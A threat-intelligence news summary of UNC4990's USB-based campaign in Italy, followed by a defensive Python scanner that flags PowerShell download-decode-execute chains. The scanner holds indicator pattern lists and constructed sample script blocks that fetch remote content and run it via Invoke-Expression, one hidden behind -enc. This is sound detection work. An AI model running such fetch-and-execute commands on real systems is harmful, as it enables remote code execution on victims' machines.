January 31, 2024 at 06:22AM
UNC4990, a financially motivated threat actor, is using weaponized USB devices to infect organizations in Italy. The attacks span several industries and rely on third-party websites to host encoded later stages that the first-stage script downloads. UNC4990 is assessed to operate out of Italy and has been active since late 2020. Its end goal is unclear, but observed activity includes deploying an open-source cryptocurrency miner. Several malware variants have been identified, including a backdoor called QUIETBOARD with extensive capabilities.
Key Takeaways from Newsroom Meeting Notes:
– UNC4990, a financially motivated threat actor, utilizes weaponized USB devices as an initial infection vector to target organizations in Italy.
– Mandiant reported that the attacks target multiple industries such as health, transportation, construction, and logistics.
– The attacker leverages third-party websites like GitHub, Vimeo, and Ars Technica to host encoded additional stages, which are downloaded and decoded via PowerShell.
– The threat actor is assessed to be operating out of Italy based on the extensive use of Italian infrastructure for command-and-control (C2) purposes.
– It is unclear whether UNC4990 acts solely as an initial access facilitator for other actors; its end goal has not been established.
– Fortgale and Yoroi previously documented details of the campaign, tracking the actor under other names such as Nebula Broker.
– The infection begins when the victim double-clicks a malicious LNK shortcut on a removable USB device. The shortcut launches a PowerShell script that retrieves a second PowerShell script hosted on Vimeo, which in turn downloads EMPTYSPACE from a remote server.
– The backdoor QUIETBOARD is a Python-based malware with a wide range of features, including executing arbitrary commands, altering crypto wallet addresses, taking screenshots, and gathering system information.
– The threat actors demonstrate adaptability and a modular approach in developing their toolset, utilizing multiple programming languages and showing a predisposition for experimentation.
– Hosting the payload on popular sites like Ars Technica, GitHub, and Vimeo poses no direct risk to everyday users: the hosted content is benign in isolation and only becomes harmful once the first-stage script downloads and decodes it.
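One detection a SOC could derive from the chain described in these notes, as an added example that is not from the Mandiant report or the original post: a Python scanner over PowerShell script-block text (for instance the body of a Windows PowerShell Event ID 4104 record) that flags the fetch-from-content-host, decode, execute pattern, and expands `-EncodedCommand` payloads first so the same chain cannot hide behind base64. The host list, the indicator regexes and the three sample script blocks are constructed for illustration; none of them is a real UNC4990 artifact.

```python
import base64
import re
from dataclasses import dataclass, field

# Content hosts the notes name as carriers for encoded stages. Hypothetical list for
# this example; extend it with whatever hosts your own telemetry shows being abused.
STAGE_HOSTS = ("vimeo.com", "github.com", "githubusercontent.com", "arstechnica.com")

# Indicator regexes grouped by role in the chain (assumed set, not an exhaustive list).
INDICATORS = {
    "download": [r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod", r"\birm\b",
                 r"DownloadString", r"DownloadData", r"Net\.WebClient"],
    "decode":   [r"FromBase64String", r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{16,}"],
    "execute":  [r"Invoke-Expression", r"\biex\b", r"\[Reflection\.Assembly\]::Load",
                 r"Start-Process"],
}


@dataclass
class Finding:
    hosts: list[str] = field(default_factory=list)       # stage hosts referenced by URL
    indicators: list[str] = field(default_factory=list)  # "category:pattern" that matched

    @property
    def suspicious(self) -> bool:
        """A stage host, a download primitive, and something that turns bytes into code."""
        cats = {i.split(":")[0] for i in self.indicators}
        return bool(self.hosts) and "download" in cats and bool(cats & {"decode", "execute"})


def expand_encoded_commands(text: str) -> str:
    """Append the plaintext of any -EncodedCommand / -enc payload (base64 of UTF-16LE)
    so indicators hidden behind it are scanned as well. Non-decodable matches are left
    as raw text and scanned as-is."""
    parts = [text]
    for m in re.finditer(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", text, re.IGNORECASE):
        try:
            parts.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return "\n".join(parts)


def analyze_script_block(text: str) -> Finding:
    """Scan one PowerShell script block for the content-host fetch, decode, execute chain."""
    expanded = expand_encoded_commands(text)
    finding = Finding()
    for host in re.findall(r"https?://([A-Za-z0-9.-]+)", expanded, re.IGNORECASE):
        host = host.lower()
        if any(host == h or host.endswith("." + h) for h in STAGE_HOSTS) and host not in finding.hosts:
            finding.hosts.append(host)
    for category, patterns in INDICATORS.items():
        for pat in patterns:
            if re.search(pat, expanded, re.IGNORECASE):
                finding.indicators.append(f"{category}:{pat}")
    return finding


# Constructed sample script blocks (not real UNC4990 artifacts).
BENIGN = "Get-ChildItem C:\\Users | Select-Object Name"

STAGED = """
$r = (New-Object Net.WebClient).DownloadString('https://vimeo.com/example-video')
$p = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r))
Invoke-Expression $p
"""

# The same chain hidden behind -enc; the base64 is built here so the sample stays self-contained.
_inner = "IEX (iwr https://raw.githubusercontent.com/example/stage.txt).Content"
ENCODED = "powershell -nop -w hidden -enc " + base64.b64encode(_inner.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    for name, block in (("benign", BENIGN), ("staged", STAGED), ("encoded", ENCODED)):
        f = analyze_script_block(block)
        print(f"{name:8} suspicious={f.suspicious} hosts={f.hosts} indicators={len(f.indicators)}")
```

Run it as a script to see the verdicts for the three samples, or feed `analyze_script_block` the script-block text field of your own 4104 events. The check deliberately requires all three legs of the chain; a script that only downloads a file from GitHub, or only decodes base64, is not flagged, which keeps the rule from firing on ordinary administration scripts.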